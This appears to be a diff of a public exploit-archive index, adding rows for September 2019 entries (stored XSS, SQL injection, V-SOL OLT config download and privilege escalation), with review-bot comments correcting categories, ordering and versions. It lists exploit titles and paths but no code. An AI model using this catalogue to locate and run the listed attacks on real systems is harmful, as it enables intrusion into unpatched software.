47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,webapps,php,
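Review bot: the new row for 47429 is typed "remote" with an empty port, but the script's own description says it writes a sessions file that takes effect when "the user double clicks in the session" after importing it into MobaXterm. That is a client-side file-format issue requiring user interaction, not a network-reachable service, so the type column and the exploits/windows/remote/ path misstate the exposure for anyone triaging by category. The description also repeats "MobaXterm 12.1" although the file's Software Link is for v11.1; settle the version in one place and mirror it here.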
@@ -41764,4 +41765,12 @@ id,file,description,date,author,type,platform,port
47424,exploits/php/webapps/47424.txt,"Duplicate-Post 3.2.3 - Persistent Cross-Site Scripting",2019-09-26,Unk9vvN,webapps,php,
47425,exploits/php/webapps/47425.txt,"all-in-one-seo-pack 3.2.7 - Persistent Cross-Site Scripting",2019-09-26,Unk9vvN,webapps,php,
47426,exploits/php/webapps/47426.txt,"inoERP 4.15 - 'download' SQL Injection",2019-09-26,"Semen Alexandrovich Lyhin",webapps,php,
+47431,exploits/php/webapps/47431.txt,"thesystem App 1.0 - Persistent Cross-Site Scripting",2019-09-27,"İsmail Güngör",webapps,php,
47427,exploits/php/webapps/47427.txt,"citecodecrashers Pic-A-Point 1.1 - 'Consignment' SQL Injection",2019-09-26,cakes,webapps,php,
+47428,exploits/php/webapps/47428.txt,"InoERP 0.7.2 - Persistent Cross-Site Scripting",2019-09-27,strider,webapps,php,
+47430,exploits/php/webapps/47430.txt,"thesystem App 1.0 - 'server_name' SQL Injection",2019-09-27,"Sadik Cetin",webapps,php,
+47432,exploits/php/webapps/47432.txt,"thesystem App 1.0 - 'username' SQL Injection",2019-09-27,"Anıl Baran Yelken",webapps,php,
+47433,exploits/hardware/webapps/47433.txt,"V-SOL GPON/EPON OLT Platform 2.03 - Unauthenticated Configuration Download",2019-09-27,LiquidWorm,webapps,hardware,
+47434,exploits/hardware/webapps/47434.txt,"V-SOL GPON/EPON OLT Platform 2.03 - Cross-Site Request Forgery",2019-09-27,LiquidWorm,webapps,hardware,
+47435,exploits/hardware/webapps/47435.txt,"V-SOL GPON/EPON OLT Platform 2.03 - Remote Privilege Escalation",2019-09-27,LiquidWorm,webapps,hardware,
+47436,exploits/php/webapps/47436.txt,"WordPress Theme Zoner Real Estate - 4.1.1 Persistent Cross-Site Scripting",2019-09-27,m0ze,webapps,php,
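Review bot: row 47431 is inserted between 47426 and 47427, which breaks the ascending id order the surrounding rows follow; it belongs after 47430. The three thesystem rows (47430, 47431, 47432) are filed as platform "php" under exploits/php/webapps, but every response captured in those files shows "Server: WSGIServer/0.2 CPython/3.5.3", so the platform column is wrong for all three. The 47430 description here says "thesystem App 1.0" while the file's own title line says "thesystem 1.0". The 47436 description mentions only Persistent Cross-Site Scripting although the file also documents an IDOR; anyone searching the index for access-control issues in that theme will miss it.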